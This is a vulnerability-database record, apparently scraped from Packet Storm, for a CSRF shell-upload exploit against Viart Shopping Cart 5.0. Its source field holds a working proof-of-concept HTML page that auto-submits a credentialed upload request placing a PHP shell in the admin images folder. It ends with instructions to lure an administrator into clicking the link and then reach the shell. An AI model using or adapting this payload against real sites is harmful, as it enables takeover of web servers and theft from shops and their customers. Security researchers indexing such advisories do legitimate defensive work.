DATABASE RESOURCES PRICING ABOUT US

{"id": "PACKETSTORM:137455", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Viart Shopping Cart 5.0 CSRF / Shell Upload", "description": "", "published": "2016-06-13T00:00:00", "modified": "2016-06-13T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/137455/Viart-Shopping-Cart-5.0-CSRF-Shell-Upload.html", "reporter": "Ali Ghanbari", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:26:01", "viewCount": 15, "enchantments": {"score": {"value": 0.5, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.5}, "sourceHref": "https://packetstormsecurity.com/files/download/137455/viartshoppingcart-xsrfshell.txt", "sourceData": "`<!-- \n# Exploit Title : Viart Shopping Cart 5.0 CSRF Shell Upload Vulnerability \n# Date : 2016/06/12 \n# Google Dork : Script-Kiddie ;) \n# Exploit Author : Ali Ghanbari \n# Vendor Homepage : http://www.viart.com/ \n# Software Link : http://www.viart.com/php_shopping_cart_free_evaluation_download.html \n# Version : 5.0 \n \n \n#POC \n--> \n \n<html> \n<body onload=\"submitRequest();\"> \n<script> \nfunction submitRequest() \n{ \nvar xhr = new XMLHttpRequest(); \nxhr.open(\"POST\", \"http://localhost/admin/admin_fm_upload_files.php\", true); \nxhr.setRequestHeader(\"Accept\", \"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\"); \nxhr.setRequestHeader(\"Accept-Language\", \"en-US,en;q=0.5\"); \nxhr.setRequestHeader(\"Content-Type\", \"multipart/form-data; boundary=---------------------------256672629917035\"); \nxhr.withCredentials = \"true\"; \nvar body = \"-----------------------------256672629917035\\r\\n\" + \n\"Content-Disposition: form-data; name=\\\"dir_root\\\"\\r\\n\" + \n\"\\r\\n\" + \n\"../images\\r\\n\" + \n\"-----------------------------256672629917035\\r\\n\" + \n\"Content-Disposition: form-data; name=\\\"newfile_0\\\"; filename=\\\"[shell.php]\\\"\\r\\n\" + \n\"Content-Type: application/x-php\\r\\n\" + \n\"\\r\\n\" + \n\"\\r\\n\" + \n\"-----------------------------256672629917035--\\r\\n\"; \nvar aBody = new Uint8Array(body.length); \nfor (var i = 0; i < aBody.length; i++) \naBody[i] = body.charCodeAt(i); \nxhr.send(new Blob([aBody])); \n} \n</script> \n</body> \n</html> \n \n<!-- \n#Desc: \n \nupload exploit code in your host and send link to admin when admin click on link, you can \naccess to your shell from below path : \n \nhttp://localhost/images/[your shell] \n \n#################################### \n \n[+]Exploit by: Ali Ghanbari \n \n[+]My Telegram :@Exploiter007 \n--> \n \n`\n", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645369007, "score": 1659770509}}

{}